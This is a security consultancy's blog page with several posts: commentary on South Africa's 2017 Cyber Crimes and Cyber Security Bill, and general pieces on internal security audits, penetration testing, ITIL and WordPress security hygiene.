Cyber security

2017 Cyber Crimes and Cyber Security Bill in a Nutshell

Broad, over-reaching laws, like sweeping statements, are dangerous. The Cyber Crimes and Cyber Security Bill of 2017, recently published by the Department of Justice, enacts one sided legislation and we foresee numerous amendments being made to the law in future in order for it to be truly effective.

 

‘SABRIC states that SA loses R2.2 billion to Internet fraud and Phishing attacks annually. The Bill creates new crimes and offences. It makes even more complex, compliance with information security and requirements pertaining to Protection of Personal Information (“POPI”). When enacted, this law will have far reaching implications for individuals and organisations, particularly those that process data, as well as for banks or electronic communications service providers.’ – Cliffe Dekker Hofmeyr Attorneys.

 

This is what you need to know

 

1. Your security tools could implicate you – whether you use them for work or not.

Unlawful acts in respect of software or hardware tool – Chapter 4.

(1) Any person who unlawfully and intentionally possesses, manufactures, assembles, obtains, sells, purchases, makes available or advertises any software or hardware tool for purposes of contravening the provisions of section 2(1), 3(1), 5(1), 6(1) or 7(1)(a) or (d), is guilty of an offence.

(2) Any person who unlawfully and intentionally uses any software or hardware tool for purposes of contravening the provisions of section 2(1), 3(1), 5(1), 6(1) or 7(1)(a) or (d), is guilty of an offence.

(3) For purposes of this section, ‘‘software or hardware tool’’ means any electronic, mechanical or other instrument, device, equipment, apparatus or a substantial component of such a device or a computer program, which is designed or adapted primarily for the purposes of— (a) securing access as contemplated in section 2(1); (b) acquiring data as contemplated in section 3(1); (c) interfering with data or a computer program as contemplated in section 5(1); (d) interfering with a computer data storage medium or a computer system as contemplated in section 6(1); or (e) acquiring, modifying, providing, making available, copying, using or cloning a password, access code or similar data or devices as defined in section 7(3)

 

Note: the law makes no provision for circumstances which may justify owning hacker tools, in fact, you will not be presumed innocent if found in possession of such tools. The onus of proving your innocence will be on you. Unlike an accused murderer / rapist / thief, who is presumed innocent until proven guilty.

 

Read: Cyber Crimes Bill still makes criminals of most of us.

 

2. Expedited Search Warrants is a thing

Scarily, the law enables police to fast forward the usual formalities of acquiring a search warrant:

Oral application for search warrant or amendment of warrant– Chapter 28.

(1) An application referred to in section 27(1)(a), or an application for the amendment of a warrant issued in terms of section 27(1)(a), may be made orally by a specifically designated police official, if it is not reasonably practicable, having regard to the urgency of the case or the existence of exceptional circumstances, to make a written application.”

 

3. The Law Extends to Posting Images

A further worry, is this section which could make sharing images on social media without consent a crime. While it seems reasonable to the ordinary you and me, consider what a restriction this is on the press who do reporting on high profile individuals.

Distribution of data message of intimate image without consent – Chapter 18.

(1) Any person who unlawfully and intentionally makes available, broadcasts or distributes, by means of a computer system, a data message of an intimate image of an identifiable person knowing that the person depicted in the image did not give his or her consent to the making available, broadcasting or distribution of the data message, is guilty of an offence. (2) For purposes of subsection (1), ‘‘intimate image’’ means a visual depiction of a person made by any means— (a) under circumstances that give rise to a reasonable expectation of privacy; and (b) in which the person is nude, is exposing his or her genital organs or anal region or, in the case of a female, her breasts.

 

4. Banks and Cellphone Companies have to Report Breaches

Obligations of electronic communications service providers and financial institutions -Chapter 52.

(1) An electronic communications service provider or financial institution that is aware or becomes aware that its computer system is involved in the commission of any category or class of offences provided for in Chapter 2 and which is determined in terms of subsection (2), must— (a) without undue delay and, where feasible, not later than 72 hours after having become aware of the offence, report the offence in the prescribed form and manner to the South African Police Service.

5. There are New Crimes Created by the Law

  • cyber fraud
  • cyber forgery
  • cyber uttering

 

6. New Structures come into Play

There are new structures all aimed at developing capacity to detect, prevent, apprehend and investigate cyber criminals.

  • 24/7 Point of Contact will render assistance with cyber crime incidents
  •  Cyber Response Committee to implement policy
  • Computer Security Incident Response Team will  facilitate co-operation with the private sector and facilitate the co-ordination and distribution of incident information

 

The newly enacted legislation will most certainly have implications on industry professionals, but also on the RICA and POPI laws, what those implications will be remains to be seen.

 

Do have questions regarding the Bill? Email: engage@ongers.com

 

OIC is an Information Security Firm based in Cape Town. We assist medium to large enterprises with all aspects of information security. Contact us: engage@ongers.com

 

information security cape town

Internal Security Audits 101

Auditing information security covers topics from auditing the physical security of data centers to auditing the logical security of databases and more. From this view point, add the dimension that each business is different and has its own challenges; and objectives in terms of the value they hope to gain from undergoing the process of the internal security audit.

 

A security audit is a systematic evaluation of the security of a company’s information system by measuring how well it conforms to a set of established criteria. A thorough audit typically assesses the security of the system’s physical configuration and environment, software, information handling processes, and user practices. Security audits are often used to determine regulatory compliance. – Techopedia

 

While the business value of an effective audit is not in question, the proposal of an audit is often met with resistance:  the Information Systems department (IS) vs the Auditor. The perception from the IS side is that they feel like they are being policed or deliberately being set up to be caught with their proverbial pants down. The result? The equivalent of digital hide and seek between two company departments who should actually be complementing each other’s role and objectives. Communicating the specific objective, playing open cards with each other and sharing insights of the systems in questions will eliminate conflict from the start.

 

There is no one-size fits all security audit

 

While it is important to ensure that your company has an Internal Security Policy that covers all aspects of information security, and audit should focus on one or two areas that will have the biggest impact on business. It could be a combination of any of the following areas:

 

  • Information Security (general)
  • Business Continuity Management
  • Mobile
  • Cloud
  • IT Risk Management
  • Programme Risk
  • Software / IT Asset Management
  • Social Media Risk Management
  • Segregation of duties / Identity and access management
  • Data loss prevention and privacy

“Effective risk management is the product of multiple layers of risk defense. Internal Audit should support the board’s need to understand the effectiveness of cybersecurity controls.”  – Deloitte.

 

Six Key Benefits

 

  • Improve the “control environment” of the organisation
  • Ensure that the organisation process-dependent instead of person-dependent
  • Identify redundancies in operational and control procedures and provides recommendations to improve the efficiency and effectiveness of procedures
  • Serve as an Early Warning System, enabling deficiencies to be identified and remediated on a timely basis (i.e. prior to external, regulatory or compliance audits)
  • Ultimately increase accountability within the organisation
  • With an internal audit function, management would have an advocate, a risk manager, a controls expert, an efficiency specialist, a problem-solving partner and a safety net.

 

 

Are you considering an internal security audit?

OIC information security cape town

 

OIC is a security consulting firm based in Cape Town. We get excited about challenging security issues and are ready to provide real solutions to securing your company’s most valuable assets:  your people, processes and technology. Contact us: engage@ongers.com

 

 

Source credits:

https://partners-network.com

https://chapters.theiia.org/Orange%20County/IIA%20OC%20Presentation%20Downloads/2015-08-%20Cyber%20IA.pdf

http://www.ey.com/Publication/vwLUAssets/Ten_key_IT_considerations_for_internal_audit/$FILE/Ten_key_IT_considerations_for_internal_audit.pdf

 

Ongers International Security Consultancy and ITIL training South Africa

What is the Value of a Penetration Test?

This excerpt from Forbes.com explains the value of the pen test.

Here are a few of the reasons organizations invest in penetration testing:

  • Determining the feasibility of a particular set of attack vectors
  • Identifying higher-risk vulnerabilities that result from a combination of lower-risk vulnerabilities exploited in a particular sequence
  • Identifying vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning software
  • Assessing the magnitude of potential business and operational impacts of successful attacks
  • Testing the ability of network defenders to successfully detect and respond to the attacks
  • Providing evidence to support increased investments in security personnel and technology to C-level management, investors, and customers
  • Meeting compliance  (for example: the Payment Card Industry Data Security Standard (PCI DSS) requires both annual and ongoing penetration testing (after any system changes)
  • Post security incident, an organization needs to determine the vectors that were used to gain access to a compromised system (or entire network). Combined with forensic analysis, a penetration test is often used to re-create the attack chain, or else to validate that new security controls put in place will thwart a similar attack in the future.

OIC offers a range of security related services, including pen testing. Read more here.

Full original article here.

Ongers International ITIL training South Africa and Security consultant

ITIL will change your service management for the better

ITIL is intentionally composed of a common sense approach to service management – do what works.

And what works is adapting a common framework of practices that unite all areas of IT service provision toward a single aim – delivering value to the business.

The following list defines the key characteristics of ITIL that contribute to its global success:

  • Non-proprietary – ITIL service management practices are applicable in any IT organization because they are not based on any particular technology platform, or industry type. ITIL is owned by the UK government and not tied to any commercial proprietary practice or solution
  • Non-prescriptive – ITIL offers robust, mature and time-tested practices that have applicability to all types of service organizations. It continues to be useful and relevant in public and private sectors, internal and external service providers, small, medium and large enterprise, and within any technical environment
  • Best practice – ITIL service management practices represent the learning experiences and thought leadership of the world’s best in class service providers
  • Good practice – Not every practice in ITIL can be considered ‘best practice’, and for good reason. For many, a blend of common, good and best practices are what give meaning and achievability to ITSM. In some respects, best practices are the flavour of the day. All best practices become common practices over time, being replaced by new best practices.

OIC offers ITIL training from small groups from foundation level. Read more here.

Source credit: myITstudy.com

Ongers international ITIL training security consulting

5 Tips for securing your digital assests

A great article by flyplugins.com, especially for companies who use wordpress.

Tip #1 – Start with a secure foundation

When it comes to security, you want to start with a secure foundation. That secure foundation is your computer or laptop. If your computer or laptop is compromised, then securing WordPress might be the least of your worries as a hacker may have entry to your financial accounts, email accounts, etc.

Make sure you use a strong password for your the login on your machine. Otherwise none of this matters.

There are sites on the internet that can create complex passwords at random. They are more difficult to memorize, but please stay away from using common passwords like “password” or “password123”. Also, please don’t keep a text file or spreadsheet on your computer or even a sticky note on your laptop that has all your passwords (yes, this actually happens). If you have tons of passwords to remember, use an application like LastPass (free) to help organize all those user accounts and passwords.

Physical security is also a big deal, especially if you use a laptop. Make sure it’s always stored in a safe location. Laptops are prime targets for hackers because they are so easy to grab and go. Your laptop has lots of information that hackers would love to get their hands on.

Make sure you are using an anti-virus program on your computer. There are free virus programs that are just as good as the expensive ones that require a yearly subscription. However, the important thing is to have some protection on your computer. Make sure you have your virus definitions updating on a daily basis.

If you want to take this a step further, you can also install a firewall program on your computer. Sometimes the anti-virus application may have a built-in firewall, however, at minimum have an anti-virus program.

Before you jump on a wifi connection, make sure you can trust it. Hackers can setup wireless routers with “free wifi” and once connected, they can sniff all the data transmitted through the router. If possible, use a VPN connection or make sure you don’t access sensitive information on the internet when on public wifi.

Tip #2 – Get on a secure web hosting service

We are currently hosted on WP Engine which has excellent server level security. Not only that, but since they are a WordPress only hosting company, they take WordPress serious. In fact, they have a “plugin blacklist” which outlines plugins that can’t be used on sites hosted on WP Engine. Those plugins are not necessarily bad, but they may contain vulnerabilities or run inefficiently which affects server speed. WP Engine may not suit everyone’s need, however, the point is to make sure you research the level of security that your hosting company provides.

Another great hosting option comes from our good friends at Pagely. Pagely also offers excellent security methods to protect their customer websites.

Tip #3 – Setup WordPress right from the get go

This could probably be a blog post in and of itself, however, I will just hit a few major points.

  • Don’t use “admin” as the primary administrator account
  • Don’t begin your database table names with ‘wp_’
  • As always, use strong passwords for the admin account(s)
  • Consider using two-factor authentication

There are tons of articles available that can help you harden your WordPress site.

Tip #4 – Stay updated and keep the trash out

When you look at your plugin list, do you notice that there are a lot of updates available? Don’t be that guy! These are not always just new features…they could potentially have security updates rolled into the latest version. It’s absolutely critical to keep WordPress up to date as well as your themes and plugins. I know some individuals are reluctant to update because they are afraid to break their site. I get it. However, most people don’t use test sites to test their themes and plugins.

Since we use WP Engine, each one of our sites has a staging site so we can test any updates before rolling them out on our production site. If you don’t have staging site, it would be worthwhile to get one even if it’s just a subdomain of your current site. You could even setup a local development environment on your computer using MAMP (Apple) or WAMP (Windows)which includes the entire development stack.

Another tip to remember is to only install plugins you trust. The plugins available on WordPress.org are typically pretty safe. They do have code reviewers looking at plugins, however, it’s only on the initial plugin submission. Just use caution with free plugins. Be sure to look at the reviews, the support topics, and the download count as they can be indicators as to whether the plugin is good or not.

A very important tip to follow is NEVER download a premium plugin for “free”. There are many sites out there slinging premium plugins for free, however, they are not safe. The plugins could contain malware and essentially you will end up with an infected website. Not to mention, it’s stealing! Most premium plugins will only provide support if the plugin purchase was legit.

Tip #5 – Secure the goods

Any time I spin up a WordPress site, one of the first plugins that gets installed is Sucuri. Sucuri is a free plugin which performs security monitoring, malware detection, and contains tools to harden your WordPress website.

If you’ve ever typed in the URL to your website only to find the “red screen of death”, then you know what it feels like to be hacked.

Believe it or not, I’ve had this happen to me and it’s no fun trying to figure out where in the world the malware has been added into your site. In fact, you could spend hours on end replacing plugins, WordPress core files, and theme files only to get re-infected.

Sucuri’s scan feature will find malware in a matter of minutes. Then you can begin the process of cleaning your site, changing passwords and hardening your site.

Here is a list of Sucuri’s primary features:

  • Security Activity Auditing
  • File Integrity Monitoring
  • Remote Malware Scanning
  • Blacklist Monitoring
  • Effective Security Hardening
  • Post-Hack Security Actions
  • Security Notifications
  • Website Firewall (cloud based firewall add-on which requires a subscription)

When you first install the plugin, it’s a little overwhelming, however, the first thing you may want to do is scan your site for malware. Go through each option carefully and configure the plugin to meet your needs as it will be well worth the time investment.

Full article source at flyplugins.com.